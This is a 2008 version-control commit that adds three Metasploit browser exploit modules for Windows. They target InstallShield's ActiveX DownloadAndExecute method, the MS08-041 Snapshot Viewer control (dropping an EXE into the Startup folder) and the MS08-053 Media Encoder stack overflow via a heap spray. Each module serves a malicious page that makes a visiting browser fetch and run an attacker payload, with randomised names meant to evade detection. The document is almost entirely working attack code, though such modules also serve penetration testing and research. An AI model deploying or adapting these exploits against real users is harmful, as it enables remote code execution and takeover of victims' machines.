added exploit modules ms08_053_mediaencoder.rb, macrovision_unsafe.rb and

ms08_041_snapshotviewer.rb git-svn-id: file:///home/svn/framework3/trunk@5707 4d416f70-5f16-0410-b530-b9f4589650da
2008-10-01 22:40:57 +00:00 · 2008-10-01 22:40:57 +00:00 · 67a25b6ce8
parent 0f03e872f1
commit 67a25b6ce8
3 changed files with 309 additions and 0 deletions
--- a/modules/exploits/windows/browser/macrovision_unsafe.rb
+++ b/modules/exploits/windows/browser/macrovision_unsafe.rb
@ -0,0 +1,92 @@
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+
+require 'msf/core'
+
+module Msf
+
+class Exploits::Windows::Browser::Macrovision_Unsafe < Msf::Exploit::Remote
+
+	include Exploit::Remote::HttpServer::HTML
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Macrovision InstallShield Update Service ActiveX Unsafe Method',
+			'Description'    => %q{
+					This module allows attackers to execute code via an unsafe methods in Macrovision InstallShield 2008.
+			},
+			'License'        => 'MSF_LICENSE',
+			'Author'         => [ 'MC' ],
+			'Version'        => '$Revision:$',
+			'References'     => 
+				[
+					[ 'CVE', '2007-5660' ],
+					[ 'BID', '26280' ],
+				],
+			'Payload'        =>
+				{
+					'Space'           => 4000,
+					'StackAdjustment' => -3500,
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+	  				[ 'Automatic', { } ],
+				],
+			'DefaultTarget'  => 0))
+
+	end
+
+   def autofilter
+      false
+   end
+
+   def check_dependencies
+      use_zlib
+   end
+
+	def on_request_uri(cli, request)
+
+		payload_url =  "http://"
+		payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+		payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"
+
+		if (request.uri.match(/payload/))
+			return if ((p = regenerate_payload(cli)) == nil)
+			data = Rex::Text.to_win32pe(p.encoded, '')
+			print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
+			send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
+			return
+		end
+
+		vname  = rand_text_alpha(rand(100) + 1)
+		exe    = rand_text_alpha(rand(20) + 1)
+		
+		content = %Q|
+			<html>
+				<object classid='clsid:E9880553-B8A7-4960-A668-95C68BED571E' id='#{vname}'></object>
+				<script language='JavaScript'>
+					#{vname}.Initialize("#{vname}","#{vname}","","");
+					#{vname}.DownloadAndExecute("","",1,"#{payload_url}/#{exe}.exe","");
+					#{vname}.DownloadAndInstall("True"); 
+				</script>
+			</html>
+						|
+
+		content = Rex::Text.randomize_space(content)
+
+		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
+
+		send_response_html(cli, content)
+	
+		handler(cli)
+		
+	end
+
+end
+end
--- a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb
+++ b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb
@ -0,0 +1,100 @@
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+
+require 'msf/core'
+
+module Msf
+
+class Exploits::Windows::Browser::MS08_041_SNAPSHOTVIEWER < Msf::Exploit::Remote
+
+	include Exploit::Remote::HttpServer::HTML
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download',
+			'Description'    => %q{
+					This module allows remote attackers to place arbitrary files on a users file system
+					via the Microsoft Office Snapshot Viewer ActiveX Control.
+			},
+			'License'        => 'MSF_LICENSE',
+			'Author'         => [ 'MC' ],
+			'Version'        => '$Revision:$',
+			'References'     => 
+				[
+					[ 'MSB', 'MS08-041' ],
+					[ 'CVE', '2008-2463' ],
+					[ 'BID', '30114' ],
+				],
+			'Payload'        =>
+				{
+					'Space'           => 4000,
+					'StackAdjustment' => -3500,
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+	  				[ 'Automatic', { } ],
+				],
+			'DefaultTarget'  => 0))
+
+			register_options(
+				[
+					OptString.new('PATH', [ true, 'The path to place the executable.', 'C:\\\\Documents and Settings\\\\All Users\\\\Start Menu\\\\Programs\\\\Startup\\\\']),
+				], self.class)
+	end
+
+	def autofilter
+		false
+	end
+
+	def check_dependencies
+		use_zlib
+	end
+
+	def on_request_uri(cli, request)
+
+		payload_url =  "http://"
+		payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+		payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"
+
+		if (request.uri.match(/payload/))
+			return if ((p = regenerate_payload(cli)) == nil)
+			data = Rex::Text.to_win32pe(p.encoded, '')
+			print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
+			send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
+			return
+		end
+
+		vname  = rand_text_alpha(rand(100) + 1)
+		exe    = rand_text_alpha(rand(20) + 1)
+		
+		content = %Q|
+		<html>
+		<head>
+			<script>
+			try {
+				var #{vname} = new ActiveXObject('snpvw.Snapshot Viewer Control.1');
+				#{vname}.SnapshotPath = "#{payload_url}";
+				#{vname}.CompressedPath = "#{datastore['PATH']}\\#{exe}.exe";
+				#{vname}.PrintSnapshot();
+			} catch( e ) { window.location = 'about:blank' ; }
+			</script>
+		</head>
+		</html>
+				|
+
+		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
+
+		send_response_html(cli, content)
+	
+		handler(cli)
+		
+	end
+
+end
+end
--- a/modules/exploits/windows/browser/ms08_053_mediaencoder.rb
+++ b/modules/exploits/windows/browser/ms08_053_mediaencoder.rb
@ -0,0 +1,117 @@
+###
+## This file is part of the Metasploit Framework and may be subject to
+## redistribution and commercial restrictions. Please see the Metasploit
+## Framework web site for more information on licensing and terms of use.
+## http://metasploit.com/projects/Framework/
+###
+
+require 'msf/core'
+
+module Msf
+
+class Exploits::Windows::Browser::MS08_053_MediaEncoder < Msf::Exploit::Remote
+
+	include Exploit::Remote::HttpServer::HTML
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow',
+			'Description'    => %q{
+				This module exploits a stack overflow in Windows Media Encoder 9. When
+				sending an overly long string to the GetDetailsString() method of wmex.dll 
+				an attacker may be able to execute arbitrary code.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         => [ 'MC' ], 
+			'Version'        => '$Revision:$',
+			'References'     => 
+				[
+					[ 'CVE', '2008-3008' ],
+					[ 'BID', '31065' ],
+					[ 'MSB', 'MS08-053' ],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Payload'        =>
+				{
+					'Space'         => 1024,
+					'BadChars'      => "\x00",
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Windows XP SP2-SP3 IE 6.0 SP0-SP2', { 'Ret' => 0x0C0C0C0C } ] 
+				],
+			'DisclosureDate' => 'Sep 9 2008',
+			'DefaultTarget'  => 0))
+	end
+
+	def autofilter
+		false
+	end
+
+	def check_dependencies
+		use_zlib
+	end
+
+	def on_request_uri(cli, request)
+		# Re-generate the payload.
+		return if ((p = regenerate_payload(cli)) == nil)
+
+		# Encode the shellcode.
+		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
+
+		# Create some nops.
+		nops    = Rex::Text.to_unescape(make_nops(4))
+
+		# Set the return.
+		ret     = Rex::Text.to_unescape([target.ret].pack('V'))
+
+		# Randomize the javascript variable names.
+		vname  = rand_text_alpha(rand(100) + 1)
+		var_i  = rand_text_alpha(rand(30)  + 2)
+		rand1  = rand_text_alpha(rand(100) + 1)
+		rand2  = rand_text_alpha(rand(100) + 1)
+		rand3  = rand_text_alpha(rand(100) + 1)
+		rand4  = rand_text_alpha(rand(100) + 1)
+		rand5  = rand_text_alpha(rand(100) + 1)
+		rand6  = rand_text_alpha(rand(100) + 1)
+		rand7  = rand_text_alpha(rand(100) + 1)
+		rand8  = rand_text_alpha(rand(100) + 1)
+
+		content = %Q|
+		<html>
+			<object id='#{vname}' classid='clsid:A8D3AD02-7508-4004-B2E9-AD33F087F43C'></object>
+			<script language="JavaScript">
+			var #{rand1} = unescape('#{shellcode}');
+			var #{rand2} = unescape('#{nops}');
+			var #{rand3} = 20;
+			var #{rand4} = #{rand3} + #{rand1}.length;
+			while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
+			var #{rand5} = #{rand2}.substring(0,#{rand4});
+			var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
+			while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
+			var #{rand7} = new Array();
+			for (#{var_i} = 0; #{var_i} < 600; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
+			var #{rand8} = "";
+			for (#{var_i} = 0; #{var_i} < 1024; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
+			#{vname}.GetDetailsString(#{rand8}, 1);
+			</script>
+		</html>
+			|
+
+		content = Rex::Text.randomize_space(content)
+
+		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
+
+		# Transmit the response to the client
+		send_response_html(cli, content)
+		
+		# Handle the payload
+		handler(cli)
+	end
+
+end
+end